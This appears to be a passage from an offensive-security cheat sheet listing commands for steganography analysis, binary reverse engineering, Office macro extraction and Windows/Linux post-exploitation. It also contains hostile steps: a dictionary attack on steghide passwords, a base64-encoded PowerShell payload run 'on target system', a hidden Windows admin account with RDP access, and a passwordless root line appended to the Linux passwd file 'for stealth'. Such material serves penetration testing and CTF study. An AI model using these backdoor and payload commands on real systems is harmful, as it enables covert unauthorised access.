Miscellaneous
Steganography:
Images – Extract Metadata with exiftool (LINK):
> exiftool ~/Downloads/offensive.jpg
Images – Search file for hidden data and extract it (-e)
> binwalk ~/Downloads/offensive.jpg [-e]
Images – Look for hidden strings (most likely at the end of file)
> strings ~/Downloads/offensive.jpg
Images – Extract hidden files
##Stegcrack is a python script to use steghide and extract password protected files with a dictionary attack (LINK).
> steghide extract -sf asd.jpg
> stegcrack ./offensive.jpg ./dictionary.txt
Reverse-Engineering:
Print all functions off a binary with Radar2:
## input aaa: analyze all (e.g. flags and function calls)
> r2 example.exe
>> aaa
## input afl: list all functions
## input pdf / pdc: Print Disassemble Function / Print C-like pseudo code
>> afl
>> pdf @ functionname
>> pdc @ functionname
## input VV: enter visual mode
## input v: list all functions
##use arrow keys to select function and input g: load function into visual mode
>> VV
>> v & >> g
Pull strings from binary:
##Very easybut often effective – use strings with different character size and endianness –encoding={s,S,b,B,l,L}
>strings -e B offensive.exe
Decompile an .NET C# binary with ILSpy (LINK):
Open binary with ILSpy
Everything else:
Pull macro code off office documents with olevba (LINK):
> sudo -H pip install -U oletools
> olevba myfile.doc –decode –deobf
Analyze java script with box-js (LINK)
> box-js bad.js
Use Base64 encoding on a powershell to avoid possible bad characters:
##Use Litte-Endian because of Windows file format
##Execute the encoded payload with powershell on target system (Example starts calc.exe)
> cat shell.ps1 | iconv -t UTF-16LE | base64 -w0
> powershell -enc YwBhAGwAYwAuAGUAeABlAAoA
Create local administrator user (Windows)
##Depending on the region the name of the local groups could be different
> net user offensiveuser 0ffens!vepassword /add
> net localgroup administrators offensiveuser /add
> net localgroup “Remote Desktop Users” offensiveuser /add
Create local root user (Linux)
##Simply edit the passwd file and append a new line instead of using adduser
##No password & no own home dir for stealth
> offensive::0:0:root:/root:/bin/bash
> offensive::0:0:::/bin/bash
Read Outlook files in Kali:
##Use apt-get install evolution or (LINK)
> Evolution My.mbox
List windows directories recursively (example list everything from an users dir)
PS > gci -recurse . | select fullname